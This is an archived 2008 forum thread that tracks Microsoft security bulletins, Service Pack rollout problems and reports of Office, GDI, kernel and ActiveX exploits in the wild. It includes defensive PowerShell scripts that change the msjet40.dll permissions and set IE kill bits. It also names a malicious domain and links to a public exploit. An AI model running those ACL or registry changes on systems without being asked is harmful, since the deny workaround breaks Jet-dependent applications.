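$JetPath      = Join-Path $env:windir 'system32\msjet40.dll'
$FixedVersion = [Version]'4.0.9505.0'

function Get-JetStatus {
    param([string]$Path = $JetPath)
    if (-not (Test-Path -LiteralPath $Path)) {
        return [pscustomobject]@{ Path = $Path; Present = $false }
    }
    # Build the version from the numeric parts rather than parsing FileVersion text.
    $vi  = (Get-Item -LiteralPath $Path).VersionInfo
    $ver = New-Object Version $vi.FileMajorPart, $vi.FileMinorPart, $vi.FileBuildPart, $vi.FilePrivatePart

    # The workaround leaves a Deny ACE for Everyone (SID S-1-1-0); compare by SID
    # so the check also works on localized systems.
    $denied = (Get-Acl -LiteralPath $Path).Access | Where-Object {
        $_.AccessControlType -eq 'Deny' -and
        $_.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value -eq 'S-1-1-0'
    }

    [pscustomobject]@{
        Path            = $Path
        Present         = $true
        FileVersion     = $ver
        BelowFixedLevel = ($ver -lt $FixedVersion)
        EveryoneDenied  = [bool]$denied
    }
}

function Set-JetWorkaround {
    # Computer-based workaround from the advisory: deny Everyone access to
    # msjet40.dll. Anything that needs the Jet engine (Access, ODBC apps)
    # stops working until Remove-JetWorkaround is run.
    & cacls $JetPath /E /P 'everyone:N'
}

function Remove-JetWorkaround {
    # Revoke the Deny ACE added above (cacls /E /R edits the ACL in place).
    & cacls $JetPath /E /R 'everyone'
}

Get-JetStatus | Format-List
```

A machine is only exposed to the Word attack vector when BelowFixedLevel is true and EveryoneDenied is false; once the fixed msjet40.dll arrives, the Deny ACE should be removed or Jet-based applications stay broken.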

AplusWebMaster
2008-03-25, 15:52
FYI...

- http://www.techarp.com/showarticle.aspx?artno=521&pgno=0
20-03-2008 - "...Due to the changes in language releases and Windows XP SP3 RTM's release, here's the updated schedule.

1. Chinese (Simplified), English, French, German, Japanese, Korean, and Spanish...
Second half of April 2008

2. Arabic, Chinese (Hong Kong), Chinese (Traditional), Czech, Danish, Dutch, Finnish, Greek, Hebrew, Hungarian, Italian, Norwegian, Polish, Portuguese (Brazilian), Portuguese (Portugal), Russian, Swedish, and Turkish...
Approximately 21 days after Wave 1 RTM

With the exception of Windows XP Media Center Edition and Windows XP Tablet Edition, Windows XP Service Pack 3 will be released in both standalone and integrated formats. It will be available in both CD and DVD formats, except for the Japanese language version which will only be in DVD format..."

:blink:

AplusWebMaster
2008-03-26, 19:49
FYI...

- http://www.symantec.com/avcenter/threatcon/learnabout.html
(2008.03.26) - "...This issue is now being exploited by a website in the wild. The attack vector that is used differs from what is typically observed for this type of vulnerability. Normally, an attacker will spam Excel files to potential victims so as to leverage the vulnerability. In this case, the exploit is hosted on a site, and the victim is silently redirected to the exploit in a similar strategy to how ActiveX client-side vulnerabilities are exploited. Specifically, the exploit XLS document is hosted in the domain 'lntop.info'. Victims are then redirected to this site through an IFRAME that is embedded in another site... Symantec AntiVirus detects the malicious XLS file as Trojan.Mdropper.AA. Customers are advised to:
- Ensure that antivirus software is up to date.
- Block access to the domain 'lntop.info'.
- Install the updates in the Microsoft Security Bulletin MS08-014."

> http://www.microsoft.com/technet/security/Bulletin/MS08-014.mspx

:fear::spider::fear:

AplusWebMaster
2008-04-01, 22:20
FYI...

- http://preview.tinyurl.com/2szypl
March 31, 2008 (Computerworld) - "...The exploit, which was posted yesterday to the Milw0rm.com Web site, takes advantage of one of two flaws fixed by Microsoft in its MS08-016* security update. Microsoft issued the update on March 11 as part of a four-bulletin batch... "The exploit that is currently available uses a PowerPoint file to leverage the vulnerability on Office XP SP3," said Symantec Corp. analyst Anthony Roe in an alert to customers of the company's DeepSight threat network. "The payload is designed to execute the 'calc.exe' calculator program on Windows. However, it will not be difficult to modify this exploit to add a malicious payload"..."
* http://www.microsoft.com/technet/security/bulletin/ms08-016.mspx?
Revisions:
• V1.0 (March 11, 2008): Bulletin published.
• V1.1 (March 12, 2008): Bulletin updated. FAQ added to clarify the reason why a non-vulnerable version of Office will be offered this update. Also removed MS07-015 as a replaced bulletin for Microsoft Office XP Service Pack 3.
• V1.2 (March 26, 2008): Bulletin updated. Added MS07-025 as a replaced bulletin for Microsoft Office 2003 Service Pack 2.

:fear:

AplusWebMaster
2008-04-03, 23:53
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-apr.mspx
April 3, 2008 - "This is an advance notification of -eight- security bulletins that Microsoft is intending to release on April 8, 2008...

Critical (5)

Microsoft Security Bulletin 1
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin 2
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin 3
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin 4
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Internet Explorer...

Microsoft Security Bulletin 5
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution
...The update requires a restart.
Affected Software: Microsoft Windows, Internet Explorer...


Important (3)

Microsoft Security Bulletin 6
Maximum Severity Rating: Important
Impact of Vulnerability: Spoofing
...The update requires a restart.
Affected Software: Microsoft Windows...

Microsoft Security Bulletin 7
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege
...The update requires a restart.
Affected Software: Microsoft Windows...

Microsoft Security Bulletin 8
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution
...The update does -not- require a restart.
Affected Software: Microsoft Office...

---

Microsoft Windows Malicious Software Removal Tool
Microsoft will release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services, and the Download Center.

Non-Security, High-Priority Updates on MU, WU, and WSUS
For information about non-security releases on Windows Update and Microsoft update, please see:

Description of Software Update Services and Windows Server Update Services changes in content for 2008. Includes all Windows content.
- http://support.microsoft.com/kb/894199/en-us

New, Revised, and Released Updates for Microsoft Products Other Than Microsoft Windows.
- http://technet.microsoft.com/en-us/wsus/bb466214.aspx ...

AplusWebMaster
2008-04-08, 01:09
FYI...

- http://preview.tinyurl.com/5omupm
April 7, 2008 (Computerworld) - " Hackers are using a new multiple-attack package composed of seven ActiveX exploits, many of them never seen in the wild before, said a security company on Friday... The attack framework probes Windows PCs for vulnerable ActiveX controls from software vendors Microsoft, Citrix Systems and Macrovision, as well as hardware makers D-Link Corp., Hewlett-Packard, Gateway and Sony... said Symantec researcher Patrick Jungles, who wrote an analysis of the multistrike package for customers of the company's DeepSight threat service. According to Jungles, visitors to compromised Web sites are redirected by a rogue IFRAME to a malicious site serving the package. The attack pack tests the victim's PC for each ActiveX control, detects whether a vulnerable version of a control is installed, and then launches an attack when it finds one... The seven exploited in the package outlined by Jungles are a mix of old and brand-new flaws... Four of the seven ActiveX flaws - those in the D-Link, Gateway, Sony, and Macrovision products - have not been patched, said Jungles... Jungles' report recommended that users apply patches, when they're available, and set the "kill bit" on those ActiveX controls which have not yet been updated by their makers."

:fear::fear:
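The "set the kill bit" advice in the Symantec report above is worth having as a script. This is an added example, not Symantec's or Microsoft's code: it lists the ActiveX controls that already have the Internet Explorer kill bit set (the 0x400 bit of the "Compatibility Flags" value under the ActiveX Compatibility key) and sets it for a given CLSID. The CLSID in the usage line is a placeholder; the thread names no specific control, so substitute the CLSID from the vendor's or Microsoft's advisory. Registry writes under HKLM need an elevated prompt.

```powershell
# Added example, not from the article or Symantec's DeepSight report.
# IE consults this key before instantiating a control; 0x400 in
# "Compatibility Flags" is the kill bit that blocks it.
$AxRoot  = 'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility'
$KillBit = 0x400

function Get-KillBitControls {
    # Enumerate every CLSID subkey and keep those whose flags include the kill bit.
    Get-ChildItem -Path $AxRoot -ErrorAction SilentlyContinue | ForEach-Object {
        $flags = (Get-ItemProperty -Path $_.PSPath -Name 'Compatibility Flags' `
                  -ErrorAction SilentlyContinue).'Compatibility Flags'
        if ($null -ne $flags -and ($flags -band $KillBit)) {
            [pscustomobject]@{
                CLSID = $_.PSChildName
                Flags = ('0x{0:X}' -f $flags)
            }
        }
    }
}

function Set-KillBit {
    param([Parameter(Mandatory)][string]$Clsid)   # form: '{GUID}'
    $key = Join-Path $AxRoot $Clsid
    if (-not (Test-Path -Path $key)) { New-Item -Path $key -Force | Out-Null }
    # OR the kill bit into any flags already present instead of overwriting them.
    $existing = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' `
                 -ErrorAction SilentlyContinue).'Compatibility Flags'
    $new = ([int]$existing) -bor $KillBit
    Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value $new -Type DWord
}

function Test-KillBit {
    param([Parameter(Mandatory)][string]$Clsid)
    $flags = (Get-ItemProperty -Path (Join-Path $AxRoot $Clsid) -Name 'Compatibility Flags' `
              -ErrorAction SilentlyContinue).'Compatibility Flags'
    return ($null -ne $flags) -and [bool]($flags -band $KillBit)
}

# Usage with a placeholder CLSID (replace with the control's real CLSID):
# Set-KillBit -Clsid '{00000000-0000-0000-0000-000000000000}'
# Test-KillBit -Clsid '{00000000-0000-0000-0000-000000000000}'
Get-KillBitControls | Format-Table -AutoSize
```

On 64-bit Windows the 32-bit Internet Explorer reads the same key under HKLM:\SOFTWARE\Wow6432Node\..., so the kill bit has to be set in both places; this is also how the MS08-023 "Security Update of ActiveX Kill Bits" and the third-party kill bits mentioned later in the thread take effect.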

AplusWebMaster
2008-04-08, 14:33
FYI...

- http://preview.tinyurl.com/3gnxtp
April 07, 2008 (MS Vista blog) - "... The Microsoft Update Blog* contains some important information about updates to the SP1 prerequisite distribution plan. Starting tomorrow, we are resuming the automatic update and installation of the Servicing Stack Update. In mid-April, we will begin distributing SP1 (in the first 5 languages) using the Automatic Update system. We have a lot of Windows users, so not everyone will get it on the same day. In fact, it will go to a small percentage of Windows Vista users each day..."
* http://preview.tinyurl.com/3fdyu2
April 07, 2008 6:12 PM by Microsoft Update Team Blog - "...you may have read that a few customers experienced an endless reboot cycle while installing one of the prerequisites: KB937287**, the Servicing Stack Update (SSU), which contains the Service Pack 1 installation program. As posted last month on the Windows Vista blog, we suspended automatic distribution of the SSU while we investigated the problem. Over the past few weeks, we’ve learned a lot more about the problem and have taken steps to address the issue. Today, we’d like to let you know that we are resuming automatic distribution of the SSU tomorrow and provide more clarity on what happened.
To clear up any concerns for those of you who have already installed the update: There is no problem with the files that make up the Servicing Stack Update (KB937287**); the problem some customers encountered was with the installation process for the update. That means if you already have the update installed, you do not need to uninstall it or install the rereleased version of the update.
- So what caused the problem? Well, the SSU has special code to check whether there are any pending reboots or other updates to install. If it sees either of these circumstances, it prevents the install from starting. During our investigation, we discovered that there were a few unknown and rare events during the middle of the installation of the update that could cause the update to think it needed a reboot to complete the installation. If this happened, the system entered a repeating reboot loop.
To address this problem for people who have not already installed the SSU, we are releasing a fix tomorrow which will install prior to the SP1 Servicing Stack Update. This pre-SSU update helps to ensure a smooth install of the SSU by working to prevent the system from rebooting during the SP1 SSU installation. We also made additional changes to the SSU installer code, so that it checks for and requires the pre-SSU (KB949939) before it will install. These two updates should now install seamlessly through Windows Update, in the proper order, so those of you with WU set to “install updates automatically” who haven’t already installed the SSU don’t have to take any further action..."
** http://support.microsoft.com/kb/937287

.

AplusWebMaster
2008-04-08, 21:30
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-apr.mspx
April 8, 2008 - "This bulletin summary lists security bulletins released for April 2008...

Critical (5)

Microsoft Security Bulletin MS08-018
Vulnerability in Microsoft Project Could Allow Remote Code Execution (950183)
- http://www.microsoft.com/technet/security/Bulletin/MS08-018.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS08-021
Vulnerabilities in GDI Could Allow Remote Code Execution (948590)
- http://www.microsoft.com/technet/security/Bulletin/MS08-021.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-022
Vulnerability in VBScript and JScript Scripting Engines Could Allow Remote Code Execution (944338)
- http://www.microsoft.com/technet/security/Bulletin/MS08-022.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-023
Security Update of ActiveX Kill Bits (948881)
- http://www.microsoft.com/technet/security/Bulletin/MS08-023.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Internet Explorer...

Microsoft Security Bulletin MS08-024
Cumulative Security Update for Internet Explorer (947864)
- http://www.microsoft.com/technet/security/Bulletin/MS08-024.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Internet Explorer...


Important (3)

Microsoft Security Bulletin MS08-020
Vulnerability in DNS Client Could Allow Spoofing (945553)
- http://www.microsoft.com/technet/security/Bulletin/MS08-020.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Spoofing...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-025
Vulnerability in Windows Kernel Could Allow Elevation of Privilege (941693)
- http://www.microsoft.com/technet/security/Bulletin/MS08-025.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-019
Vulnerabilities in Microsoft Visio Could Allow Remote Code Execution (949032)
- http://www.microsoft.com/technet/security/Bulletin/MS08-019.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

---------------------------------------

ISC Analysis
- http://isc.sans.org/diary.html?storyid=4264
Last Updated: 2008-04-08 17:42:25 UTC

AplusWebMaster
2008-04-11, 01:02
FYI...

- http://isc.sans.org/diary.html?storyid=4274
Last Updated: 2008-04-10 21:20:25 UTC - "It appears that Symantec has raised the Threatcon to Level 2 this afternoon...
- http://www.symantec.com/security_response/threatcon/index.jsp
'...The DeepSight honeynet has observed in-the-wild exploit attempts targeting a GDI vulnerability patched by Microsoft on April 8, 2008. The malicious image appears to target the Microsoft Windows GDI Stack Overflow Vulnerability (BID 28570). At least three different sites are hosting the images; two different malicious binaries are associated with the attacks. Analysis of the images has shown that although they appear to be malicious, they do not contain enough data in the associated image property to sufficiently trigger the vulnerability. We are still investigating as to why this may be the case. Users are advised to apply the MS08-021* patches immediately. These attack attempts highlight the severity of this issue -- it is only a matter of time before new images that successfully trigger the issue are observed in the wild... some of the associated malware that is delivered with the attack is not detected...'
* http://www.microsoft.com/technet/security/Bulletin/MS08-021.mspx
(Microsoft Security Bulletin MS08-021 – Critical
Vulnerabilities in GDI Could Allow Remote Code Execution (948590)
Published: April 8, 2008 ...)
...If you haven't already patched do so now and don't forget to remind your users not to open image files."
---------------------------------------------------

Exploiting Latest GDI Vulnerability Found in the Wild
- http://preview.tinyurl.com/4nkzn8
April 10, 2008 (Symantec Security Response Weblog) - "...It is possible that these exploits either have been leaked and are "in-work" copies, or that they are functional on some platform that we have not tested. However, the exploit (named "top.jpg") does contain functional payload, which downloads a secondary file (word.gif). Word.gif is really an executable that would be run following a successful infection. Its main function would be to use iexplore.exe to contact a few hosts in China, presumably to download additional malicious code..."

:fear::fear:

AplusWebMaster
2008-04-11, 18:47
FYI...

April 2008 - Black Tuesday Overview
- http://isc.sans.org/diary.html?storyid=4264
Last Updated: 2008-04-11 13:59:44 UTC
"...
MS08-021 ...Symantec has reported non-working exploits in the wild...
- http://www.symantec.com/security_response/threatcon/index.jsp
"...Users are advised to apply the MS08-021 patches immediately. These attack attempts highlight the severity of this issue -- it is only a matter of time before new images that successfully trigger the issue are observed in the wild..."

MS08-023 ...PoC exploits were posted on the internet...
( 3rd party killbit for Yahoo! Music Jukebox activeX control )

:fear:

AplusWebMaster
2008-04-12, 14:55
FYI...

Elevated ATLAS Threat Index - GDI Exploits in the Wild
- http://asert.arbornetworks.com/2008/04/elevated-atlas-threat-index-gdi-exploits-in-the-wild/
April 11, 2008 - "The ATLAS Threat Index is used to track global security issues as a barometer, and we’re raising the index (something we don’t do very often). We are doing so because we see evidence that the GDI vulnerability - MS08-021 - is being exploited in the wild. We have not yet seen widespread attacks, but we anticipate that this attack vector will grow in popularity in the coming days, similar to the WMF and ANI attack vectors in the past couple of years..."

- http://www.us-cert.gov/current/#active_exploitation_of_gdi_vulnerabilities
April 11, 2008 - "US-CERT is following public reports indicating that attackers are attempting to exploit vulnerabilities in GDI. These vulnerabilities are due to buffer overflow conditions that exist in the processing of EMF and WMF image files. By convincing a user to open a specially crafted EMF or WMF file, a remote attacker may be able to execute arbitrary code. These vulnerabilities were addressed in Microsoft Security Bulletin MS08-021. Users who have not applied this patch are vulnerable..."

:fear:

AplusWebMaster
2008-04-16, 05:32
FYI...

- http://isc.sans.org/diary.html?storyid=4264
Last Updated: 2008-04-16 01:23:53 UTC ...(Version: 5)

Overview of the April 2008 Microsoft patches and their status...

MS08-020 - DNS client - Update: well published problem

MS08-021 - GDI - Update: April 11th: Arbor networks reporting exploits in the wild

MS08-022 - Scripting engines - Update: PoC available in for pay program

MS08-023 - ActiveX - PoC exploits were posted on the internet

MS08-025 - Windows kernel - Proof of concept available in a for pay program

:fear::spider::fear:

AplusWebMaster
2008-04-17, 19:58
FYI...

- http://www.theregister.co.uk/2008/04/16/vista_defender_sp1/
16 April 2008 - "Microsoft has admitted it is investigating reports that a recent Windows Vista security update causes havoc with some USB devices, but the software giant is yet to provide a fix for the cock-up. The Windows Defender update was released last week, but some unfortunate Vista customers have claimed that their USB mice and keyboards among other devices refuse to work after the update is installed on their computers... the automatic version of the (SP1) download remains missing in action. Redmond had chalked mid-April as the date when SP1 would start downloading onto computers across the world..."

:sad:

AplusWebMaster
2008-04-18, 15:04
FYI...

Microsoft Security Advisory (951306)
Vulnerability in Windows Could Allow Elevation of Privilege
- http://www.microsoft.com/technet/security/advisory/951306.mspx
April 17, 2008 - "Microsoft is investigating new public reports of a vulnerability which could allow elevation of privilege from authenticated user to LocalSystem, affecting Windows XP Professional Service Pack 2 and all supported versions and editions of Windows Server 2003, Windows Vista, and Windows Server 2008. Customers who allow user-provided code to run in an authenticated context, such as within Internet Information Services (IIS) and SQL Server, should review this advisory. Hosting providers may be at increased risk from this elevation of privilege vulnerability. Currently, Microsoft is not aware of any attacks attempting to exploit the potential vulnerability. Upon completion of this investigation, Microsoft will take the appropriate action to protect our customers..."

AplusWebMaster
2008-04-19, 13:52
FYI...

...Vista SP1 is not available for installation from WU and is not offered by Automatic Updates
- http://support.microsoft.com/?kbid=948343
Last Review: April 18, 2008 <<<
Revision: 6.0...


:lip:

AplusWebMaster
2008-04-22, 02:56
FYI...

(Another tale of "Windows Genuine Annoyance" - an Office nag)
- http://preview.tinyurl.com/4wona3
April 19, 2008 (Computerworld) - "... By early Wednesday, administrators in the U.S., the U.K., New Zealand and elsewhere were posting messages on Microsoft support newsgroups, asking why their WSUS systems had received the Office nag. In some cases, administrators reported that the update had fingered large numbers of desktop PCs as running counterfeit copies of Office. "Update KB949810 arrived via WSUS yesterday, and now all my XP workstations running Word 2002 are telling me it needs activating," said a user... in the U.K. "The only problem is that the software is genuine and was activated three years ago"... "There is nothing more frustrating as a Microsoft shareholder to constantly see Microsoft shoot themselves in the foot by treating legal customers in this manner.*"..."
* http://forums.microsoft.com/Genuine/ShowPost.aspx?PostID=3188048&SiteID=25

:lip:

AplusWebMaster
2008-04-22, 04:28
FYI...

- http://preview.tinyurl.com/3nkl3q
April 21, 2008 (Computerworld) - "Microsoft Corp. today finally slapped a "Done" sticker on Windows XP Service Pack 3 and pushed it out the door. The designation of SP3 as RTM, short for "release to manufacturing"..."
(Many "Q&A's" at the URL above.)

Overview of Windows XP SP3 - link to .pdf file here
- http://preview.tinyurl.com/35uwdq
428 K
Windows XP SP3 forum
- http://forums.microsoft.com/TechNet/ShowForum.aspx?ForumID=2010&SiteID=17

- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=207401041
April 21, 2008 - "...the third and final service pack for its Windows XP operating system and that the update will be available for public download on April 29... The service pack should offer a number of enhancements over the current version of the OS. It includes all updates issued since Windows XP Service Pack 2 was released in 2004, and some new elements. Among them: A feature called Network Access Protection that's borrowed from the newer Windows Vista operating system. NAP automatically validates a computer's health, ensuring that it's free of bugs and viruses before allowing it access to a network. Windows XP SP3 also includes improved "black hole" router detection -- a feature that automatically detects routers that are silently discarding packets. In XP SP3, the feature is turned on by default, according to Microsoft..."

AplusWebMaster
2008-04-24, 17:34
FYI...

- http://preview.tinyurl.com/5vu4aw
April 23, 2008 (Infoworld) -"...Vista Service Pack 1 will download automatically to PCs that have the automatic update feature of the OS turned on, the company said. Previously, Vista was available to customers via Windows Update, but people had to specifically download it. Not all customers will receive SP1 immediately via Automatic Update, however. The company is distributing it in phases to "ensure a seamless download experience," Microsoft said. A timeline for when all customers would receive Vista SP1 via Automatic Update was not immediately available..."

- http://support.microsoft.com/?kbid=948343
Last Review: April 23, 2008
Revision: 7.0...

AplusWebMaster
2008-04-29, 21:16
FYI...

- http://isc.sans.org/diary.html?storyid=4358
Last Updated: 2008-04-29 17:03:11 UTC - "...the Windows Service Pack blocker tool can now block the following service packs from installation...
* Windows XP Service Pack 3 (valid for 12 months following general availability)
* Windows Vista Service Pack 1 (valid for 12 months following general availability)
So, if you want to prevent your machines from automatic updates (provided you don't use WSUS), you can download this handy tool from here*..."
* http://preview.tinyurl.com/2uryvq
Windows Service Pack Blocker Tool Kit
Quick Details
File Name: SPBlockerTools.EXE
Version: SPBlockerToolKit
Date Published: 12/6/2007
Language: English
Download Size: 96 KB

:spider:

AplusWebMaster
2008-04-30, 00:58
FYI...

MS delays release of XPSP3
- http://preview.tinyurl.com/56vprz
April 29, 2008 (Infoworld) - "Microsoft has delayed the release of a third service pack for Windows XP, blaming a "compatibility issue" between the software and a retail-chain-management application... incompatibilities discovered in the past several days between an application called Microsoft Dynamics RMS and -both- Windows XP SP3 and Windows Vista Service Pack 1 will force the company to hold off on releasing the software. Dynamics RMS is retail-chain-management software for SMBs. Microsoft said it is putting filtering in place to prevent its Windows Update service from offering both service packs to systems running Microsoft Dynamics RMS. Once that filtering is in place, Microsoft will release Windows XP SP3 to Windows Update and Download Center for users not running the application causing the problem.
The company on Tuesday did not say how long putting in filters would take. Microsoft is recommending that Microsoft Dynamics RMS customers not install Windows XP SP3 or Windows Vista SP1. For more information, those customers should contact Microsoft Customer Support Services, the company said. A fix to the Dynamics RMS problem is being tested and "will be available as soon as that process is complete," Microsoft said. The company did not provide a time frame for completion of the testing..."

AplusWebMaster
2008-04-30, 23:20
FYI...

- http://www.milw0rm.com/exploits/5518
2008-04-28 - "[Windows XP SP2 (win32k.sys)] This exploit takes advantage of one of the vulnerabilities patched in the Microsoft Security bulletin MS08-025
http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx ..."
Vulnerability in Windows Kernel Could Allow Elevation of Privilege (941693)

:fear:

AplusWebMaster
2008-05-04, 03:29
FYI...

Vista Audio Driver...
- http://isc.sans.org/diary.html?storyid=4376
Last Updated: 2008-05-03 23:26:07 UTC - "...a recent update offered for a driver update for IDT (Formerly Sigmatel)'s high definition sound is causing problems for -Dell- users that have installed it. "Should you see this update appear, *do not* install it," warned 'Chris B', a Dell Digital Life Liaison, in a Thursday forum post. The update is called IDT High Def Codec and was reported to be one of the drivers that held up the release of SP1 for Vista back in February. If you have a Dell computer and have not yet installed Vista SP1, you may want to take a look at the full article.
- http://www.crn.com/software/207500472 "

:sad:

AplusWebMaster
2008-05-05, 20:51
Good grief...

Vista Service Pack 1 is not available...
- http://support.microsoft.com/?kbid=948343
Article ID: 948343
Last Review: May 5, 2008
Revision: 9.0...

:sad:

AplusWebMaster
2008-05-06, 14:58
FYI...

Windows Vista SP1 Disaster Recovery Guide
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=207402843
May 6, 2008


.

AplusWebMaster
2008-05-06, 23:48
FYI...

- http://isc.sans.org/diary.html?storyid=4387
Last Updated: 2008-05-06 20:10:06 UTC - "Microsoft, it appears, has just released Windows XP Service Pack 3*. For the most part, it is a bundle of all the updates since Service Pack 2, but there are some key differences.
First, the big gotcha:
- If you are an IE 6 user, SP3 will simply update your IE 6 installation. You will continue to be able to upgrade to IE 7 as an option.
- If you are an IE 7 user, it will update your IE 7 installation. HOWEVER, you will NOT be able to go back to IE 6 after applying this service pack.
- If you are an IE 8 (beta) user, you will need to uninstall IE 8, apply the service pack, and then reinstall IE 8.
This link** has a list of all the Knowledge Base articles that this service pack addresses. Some of the bigger notes are that it does retrofit some of the Vista functionality into XP, namely in the area of Network Access Protection, Black Hole Router Detection, enhanced security for administrator and service policy entries (basically some better default settings) and a kernel mode crypto driver. Additionally, some of the "optional" updates released since SP2 will be installed with SP3 (MMC 3.0, MSXML6, WPA2 support, etc). The good news is that TechNet provides installation media that can be used to slipstream install the service pack so workstations can be updated off the net."

Windows XP SP3 Network Installation Package for IT Professionals and Developers
* http://preview.tinyurl.com/6k9zo3
316.4 MB
"...Note: Customers running Microsoft Dynamics Retail Management System (RMS) are advised to install a hotfix for a Microsoft Dynamics RMS issue -prior- to installing Windows XP SP3. http://support.microsoft.com/kb/951937
DO NOT CLICK DOWNLOAD IF YOU ARE UPDATING JUST ONE COMPUTER: A smaller, more appropriate download is now available on Windows Update..."

Release notes for Windows XP Service Pack 3
** http://support.microsoft.com/kb/936929
Last Review: May 6, 2008
Revision: 5.0...

:fear:

AplusWebMaster
2008-05-08, 20:52
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-may.mspx
May 8, 2008
"This is an advance notification of security bulletins that Microsoft is intending to release on May 13, 2008...

Critical (3)

Word Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Publisher Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Jet Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...


Moderate (1)

Security Software Bulletin
Maximum Severity Rating: Moderate
Impact of Vulnerability: Denial of Service...
Affected Software: Windows Live OneCare, Microsoft Antigen, Microsoft Windows Defender, Microsoft Forefront Security...

AplusWebMaster
2008-05-09, 13:52
FYI...

XP SP3 crashes AMD machines
- http://www.theinquirer.net/gb/inquirer/news/2008/05/09/xp-sp3-crashes-amd-machines
9 May 2008 - "...Windows XP, Service Pack 3, is giving owners of machines with AMD hardware headaches aplenty it seems. The problems, which first arose just one day after the push, have been causing lots of noise on Microsoft support sites and angry user blogs. One user reported, "I just installed Windows XP SP3 and after completing the processes and when the system reboots, the system cannot proceed to load the Windows. It just displays the flash screen of Windows then after it reboots again." Angry users have also reported that, after the installation, it is not even possible to boot in safe mode, usually the last resort before setting up a repeated forehead/screen interface... there appear to be two separate problems. One affects only AMD-equipped PCs sold by Hewlett-Packard. "The problem is that HP, apparently along with other OEMs, deploys the same image to Intel-based computers that they do to AMD-based computers," said Johansson. "Because the image for both Intel and AMD is the same all have the intelppm.sys driver installed and running. That driver provides power management on Intel-based computers. On an AMD-based computer, amdk8.sys provides the same functionality." There's a whole bunch of other info and some useful fixes for those of you stuck in the dreaded loop of death over on Jesper's Blog*."
* http://preview.tinyurl.com/6zs52d
(MSinfluentials.com/blogs/jesper)

:sad::trample::thud:

AplusWebMaster
2008-05-13, 20:57
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-may.mspx
May 13, 2008
"This bulletin summary lists security bulletins released for May 2008...

Critical (3)

Microsoft Security Bulletin MS08-026
Vulnerabilities in Microsoft Word Could Allow Remote Code Execution (951207)
- http://www.microsoft.com/technet/security/bulletin/ms08-026.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS08-027
Vulnerability in Microsoft Publisher Could Allow Remote Code Execution (951208)
- http://www.microsoft.com/technet/security/bulletin/ms08-027.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS08-028
Vulnerability in Microsoft Jet Database Engine Could Allow Remote Code Execution (950749)
- http://www.microsoft.com/technet/security/bulletin/ms08-028.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Moderate (1)

Microsoft Security Bulletin MS08-029
Vulnerabilities in Microsoft Malware Protection Engine Could Allow Denial of Service (952044)
- http://www.microsoft.com/technet/security/bulletin/ms08-029.mspx
Maximum Severity Rating: Moderate
Impact of Vulnerability: Denial of Service...
Affected Software: Windows Live OneCare, Microsoft Antigen, Microsoft Windows Defender, Microsoft Forefront Security...


New, Revised, and Rereleased Updates for Microsoft Products Other Than Microsoft Windows
- http://technet.microsoft.com/en-us/wsus/bb466214.aspx


ISC Analysis
- http://isc.sans.org/diary.html?storyid=4411
Last Updated: 2008-05-13 17:59:16 UTC

AplusWebMaster
2008-05-17, 04:51
FYI...

Microsoft Security Advisory (950627)
Vulnerability in Microsoft Jet Database Engine Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/950627.mspx
Updated: May 13, 2008 - "...We have issued Microsoft Security Bulletin MS08-028 to address this issue. For more information about this issue, including download links for an available security update, please review MS08-028*... In addition to immediately installing the update in Microsoft Security Bulletin MS08-028, we recommend that customers with Microsoft Word also immediately install the update in Microsoft Security Bulletin MS08-026**: Vulnerabilities in Microsoft Word Could Allow Remote Code Execution (951207), for the most up-to-date protection against the attack vector for these types of attacks..."

* http://go.microsoft.com/fwlink/?LinkId=114750

** http://go.microsoft.com/fwlink/?LinkId=117295

